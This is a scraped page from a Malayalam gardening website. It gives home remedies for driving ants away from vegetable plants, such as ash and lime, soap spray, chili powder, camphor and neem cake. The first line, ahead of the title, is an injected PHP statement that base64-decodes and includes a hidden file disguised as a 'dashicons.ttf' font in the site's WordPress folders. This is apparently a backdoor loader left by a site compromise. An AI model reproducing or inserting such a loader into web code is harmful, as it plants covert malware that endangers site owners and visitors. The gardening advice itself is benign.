@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); പച്ചക്കറികളിലുണ്ടാകുന്ന ഉറുമ്പ് ശല്യത്തിന് | HORTICOPS

പച്ചക്കറികളിലുണ്ടാകുന്ന ഉറുമ്പ് ശല്യത്തിന്

ചിലയിനം ഉറുമ്പുകള്‍ പച്ചക്കറിവിളകളില്‍ കേടുപാടുണ്ടാക്കാറുണ്ട്. എന്നാല്‍, മിശിറ് (നീറ്) പോലുള്ളവ കര്‍ഷകന് ഉപകാരികളാണ്.
മിശിറുകള്‍ പച്ചക്കറികളിലെ കീടങ്ങളെയും അവയുടെ മുട്ടകളെയും കൊന്നൊടുക്കുമെന്നതിനാല്‍ ഈ ഉറുമ്പുകളെ ശല്യപ്പെടുത്തരുത്. *ശല്യക്കാരായ ഉറുമ്പുകളെ അകറ്റാന്‍ പരിസ്ഥിതിസൗഹൃദപരമായ നിയന്ത്രണരീതി അനുവര്‍ത്തിക്കാം
ഒരു കിലോഗ്രാം ചാരത്തില്‍ കാല്‍ക്കിലോഗ്രാം വീതം കക്ക നീറ്റിയതും കല്ലുപ്പ് പൊടിച്ചതും ചേര്‍ത്ത് ഉറുമ്പിന്റെ സാന്നിധ്യമുള്ളയിടങ്ങളില്‍ വിതറുക. ഈ മിശ്രിതത്തിന്റെ ചൂടും നീറ്റലും ഉറുമ്പുകളെ തുരത്തും.
സോപ്പുവെള്ളം സ്പ്രേ ചെയ്യുന്നതിലൂടെ ഉറുമ്പുകൾ പോകുകയും ചെയ്യും.
മുളകു പൊടി, ഉപ്പ് എന്നിവ വിതറുന്നതും നല്ലതു തന്നെ. ഇവ വെള്ളത്തില്‍ കലക്കി സ്പ്രേ ചെയ്യുകയുമാകാം.
കര്‍പ്പൂര തുളസി ഉണക്കിപ്പൊടിച്ചിടുന്നത് ഉറുമ്പിനെ അകറ്റും.
മസാലകളായി ഉപയോഗിക്കുന്ന ഗ്രാമ്പൂ, വഴനയില എന്നിവ ഉറുമ്പുകള്‍ ഉള്ളിടത്ത് വിതറുന്നത് നല്ലതാണ്.
കർപ്പൂരം എണ്ണയിൽ പൊടിച്ച് ചേർത്ത് ഒരു തുണിയിൽ എടുത്ത് ഉറുമ്പ് വരുന്ന ഭാഗത്ത് തുടച്ചിടുക
എല്ലുപൊടി & കടലപിണ്ണാക്ക് വളമായി നൽകുമ്പോൾ ഉറുമ്പ് വരാൻ സാദ്യത കൂടുതലാണ് ,അതിന് പരിഹാരമായി വേപ്പിൻപിണ്ണാക്ക് പൊടിച്ച് അല്പം ചാരവും ചേർത്ത് മണ്ണിന് മുകളിൽ ചെടിക്ക് ചുറ്റും വിതറുക
അടുക്കളയുടെ പാതകം വിനാഗിരി മുക്കിയ തുണി കൊണ്ടു തുടച്ചാല്‍ ഉറുമ്പിനെ അകറ്റി നിര്‍ത്താം.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *